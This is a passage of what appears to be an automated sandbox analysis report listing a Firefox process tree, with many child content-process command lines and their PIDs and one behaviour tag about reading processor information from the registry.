      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8660 -childID 18 -isForBrowser -prefsHandle 7144 -prefMapHandle 7992 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3712b93e-05b4-4dfa-9efb-fc99b28920eb} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:7604
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7056 -childID 19 -isForBrowser -prefsHandle 5608 -prefMapHandle 5564 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b293dcd5-5777-4e67-8f04-a90813411a71} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:7644
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6780 -childID 20 -isForBrowser -prefsHandle 6768 -prefMapHandle 6772 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {76a08c1f-1e0d-4330-84ec-6b451db09755} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:6392
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5500 -childID 21 -isForBrowser -prefsHandle 5736 -prefMapHandle 5444 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {52e7bf9c-79d7-4f05-8644-6e2aa6e3b230} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:7384
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8756 -childID 22 -isForBrowser -prefsHandle 5424 -prefMapHandle 5864 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7f399b3-cc33-4fdf-bbab-c419fd84100f} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:7576
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8808 -childID 23 -isForBrowser -prefsHandle 6116 -prefMapHandle 7748 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2008178-470d-4b09-a157-80b1ddbaa5ee} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:3216
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6376 -childID 24 -isForBrowser -prefsHandle 4620 -prefMapHandle 4628 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2dd68cad-82a7-407a-a4aa-fbfa114e4533} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:4012
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5908 -childID 25 -isForBrowser -prefsHandle 7960 -prefMapHandle 8296 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed820a66-5914-4545-9181-78ae0c3ce28a} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:7592
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5588 -childID 26 -isForBrowser -prefsHandle 4832 -prefMapHandle 5256 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8ad04223-510a-41ee-839e-54d25368a6bc} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:4952
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8716 -childID 27 -isForBrowser -prefsHandle 2752 -prefMapHandle 8876 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b94c871-96d8-4e14-b416-5a16bf1e4b0f} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:3384
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6952 -childID 28 -isForBrowser -prefsHandle 5340 -prefMapHandle 6140 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {99d77042-f52a-4b55-8ce8-f42b3df73b35} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:4552
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5456 -parentBuildID 20240401114208 -prefsHandle 5480 -prefMapHandle 7008 -prefsLen 30628 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {29c9b6be-0361-4510-9439-5779c52d5026} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" rdd
      4⤵
      PID:6260
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8092 -childID 29 -isForBrowser -prefsHandle 5328 -prefMapHandle 5968 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {62f5a5ef-28c3-4325-a73c-993c5c44212f} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:2948
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7936 -childID 30 -isForBrowser -prefsHandle 8696 -prefMapHandle 7144 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {832bc6dc-ae66-45fd-96cc-be7ec3ef2f72} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:5004
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9136 -childID 31 -isForBrowser -prefsHandle 9052 -prefMapHandle 9060 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae5c008a-f4a8-4bf0-9bf2-a92b40891ed4} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:3616
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9236 -childID 32 -isForBrowser -prefsHandle 9244 -prefMapHandle 7472 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f3402a1-5dd9-4bf4-b3cc-7617e031736e} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:5384
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9456 -childID 33 -isForBrowser -prefsHandle 9540 -prefMapHandle 9536 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6a62e4c-dc39-47e3-8e3c-10cacf4dc007} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:8164
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9500 -childID 34 -isForBrowser -prefsHandle 9320 -prefMapHandle 9324 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f98688f1-13c9-467c-a34e-be156a532a03} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:6376
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9276 -childID 35 -isForBrowser -prefsHandle 9720 -prefMapHandle 8124 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bbd524f5-bad5-45cc-a818-7cf550786fa8} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:7344
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9904 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 9896 -prefMapHandle 9760 -prefsLen 30628 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {177c3735-de1f-4f4a-8a0f-75690aedca85} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" utility
      4⤵
      Checks processor information in registry
      PID:3108
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10076 -childID 36 -isForBrowser -prefsHandle 10068 -prefMapHandle 10064 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a8b592f-c6f2-470c-a43c-713cca7ba33f} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:8432
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10064 -childID 37 -isForBrowser -prefsHandle 10088 -prefMapHandle 9840 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {beadd529-bbeb-4285-98fd-ed7100253432} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:8692
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10492 -childID 38 -isForBrowser -prefsHandle 10408 -prefMapHandle 10416 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c3824ed-2b77-4d44-8352-def014a586f0} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:8704
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10684 -childID 39 -isForBrowser -prefsHandle 10600 -prefMapHandle 10604 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9afc916a-9f65-442a-8e51-41fb0c4bba4e} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:8716
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10856 -childID 40 -isForBrowser -prefsHandle 10872 -prefMapHandle 10868 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c00d80bf-e391-432f-9c42-b966a497e430} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:6060
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9816 -childID 41 -isForBrowser -prefsHandle 6292 -prefMapHandle 8716 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97e9ceb9-a45b-4553-b4b4-1e9bd451913b} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:228
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9060 -childID 42 -isForBrowser -prefsHandle 5340 -prefMapHandle 5436 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b751a6e-c23c-4658-9ae1-c90896013002} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:4584
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8856 -childID 43 -isForBrowser -prefsHandle 10044 -prefMapHandle 10032 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf0fb841-6127-4576-827a-71e3d9a541ec} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:4148
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5968 -childID 44 -isForBrowser -prefsHandle 9716 -prefMapHandle 9304 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0de5538f-ed00-44fa-ad1c-85dce6e313d7} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:7468
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9708 -childID 45 -isForBrowser -prefsHandle 9756 -prefMapHandle 9556 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1dac007-658f-40a6-802b-e7f1d749e26d} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:8180
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10192 -childID 46 -isForBrowser -prefsHandle 6952 -prefMapHandle 9220 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97e25ade-9b64-4d96-8cc2-accf00fef77e} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:2272
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9332 -childID 47 -isForBrowser -prefsHandle 6768 -prefMapHandle 6660 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a10e2379-916c-4cd1-9408-42bd9ae3420d} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:4816
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5760 -childID 48 -isForBrowser -prefsHandle 7356 -prefMapHandle 9428 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aada350a-0f4c-4500-a27b-45210593a33f} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:2316
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5096 -childID 49 -isForBrowser -prefsHandle 10836 -prefMapHandle 6000 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e0279a1-6bcb-4534-a7c1-6e02e577b684} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:8300
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9124 -childID 50 -isForBrowser -prefsHandle 10088 -prefMapHandle 8368 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b32c474-64cc-4adf-b6f2-e5d5b885b38b} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:5208
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6452 -childID 51 -isForBrowser -prefsHandle 7920 -prefMapHandle 7556 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cdfde5f2-9484-4116-8770-343defc4acb3} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:780
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10968 -childID 52 -isForBrowser -prefsHandle 5328 -prefMapHandle 8112 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c8aa740-0e71-4205-87ea-14bd9275d13e} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:7620
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10292 -childID 53 -isForBrowser -prefsHandle 10312 -prefMapHandle 10300 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {251b07c5-f692-487a-98a4-d23599dfc1ad} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:1948
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10024 -childID 54 -isForBrowser -prefsHandle 10600 -prefMapHandle 10668 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {764fd49e-8a03-4ffe-b1e6-8fe33465de96} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:3028
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10640 -childID 55 -isForBrowser -prefsHandle 10948 -prefMapHandle 10944 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {800613c3-0628-45df-a9a7-7523d3ff7078} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:6976
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11380 -childID 56 -isForBrowser -prefsHandle 5892 -prefMapHandle 9640 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6112b756-34c4-4451-8be6-980b4fd6f147} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:6632
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5728 -childID 57 -isForBrowser -prefsHandle 10364 -prefMapHandle 5076 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0544dbcb-3eff-44f2-ae3d-d87f5b2d814e} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:8380
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9664 -childID 58 -isForBrowser -prefsHandle 11212 -prefMapHandle 5584 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eccc3590-6934-42fd-b2af-44810bf0ad2b} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:4960
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8772 -childID 59 -isForBrowser -prefsHandle 11204 -prefMapHandle 11208 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {661e7d28-e8e3-4afd-97e9-82e5eda677e0} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:7700
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10872 -childID 60 -isForBrowser -prefsHandle 8784 -prefMapHandle 9664 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {36f2e1ea-9eba-42eb-8988-54376cbe966f} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:7268
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9568 -childID 61 -isForBrowser -prefsHandle 10800 -prefMapHandle 7824 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1538eafc-9462-4992-99d4-d7c245dae68d} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:4188
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9792 -childID 62 -isForBrowser -prefsHandle 9748 -prefMapHandle 5100 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {71d23352-376a-4b00-8317-b9910f221f00} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:8632
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11004 -childID 63 -isForBrowser -prefsHandle 10424 -prefMapHandle 11360 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e1db730-edc5-40ee-b64c-50be02534473} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:4032
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9144 -childID 64 -isForBrowser -prefsHandle 5532 -prefMapHandle 8892 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5ec49a9-748a-465f-9acd-00c920c123e2} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:3120
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9240 -childID 65 -isForBrowser -prefsHandle 6824 -prefMapHandle 10288 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {efb7311f-a2de-409a-a0fb-44d60fc2a89b} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:1100
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5964 -childID 66 -isForBrowser -prefsHandle 9592 -prefMapHandle 8784 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {df9b166e-42ec-4be4-852a-8e17c24b629d} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:8728
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10980 -childID 67 -isForBrowser -prefsHandle 9748 -prefMapHandle 9240 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7fd437d4-b92a-40c7-bde1-9d2f6c531036} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:8404
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2272 -childID 68 -isForBrowser -prefsHandle 8164 -prefMapHandle 10344 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1babfa9-23a6-4ae4-a6a7-76e9d9b6540c} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:9032
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5592 -childID 69 -isForBrowser -prefsHandle 9536 -prefMapHandle 7408 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0c671f5-8f30-4dee-83c5-fe4a641b6ff9} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:8892
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3524 -childID 70 -isForBrowser -prefsHandle 7888 -prefMapHandle 9448 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {99bae625-d284-4b6f-817c-6a2465b41670} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:8112
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9112 -childID 71 -isForBrowser -prefsHandle 7048 -prefMapHandle 10728 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {812a005c-76ec-4b1a-88b6-0f1557dd0ad8} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:8044
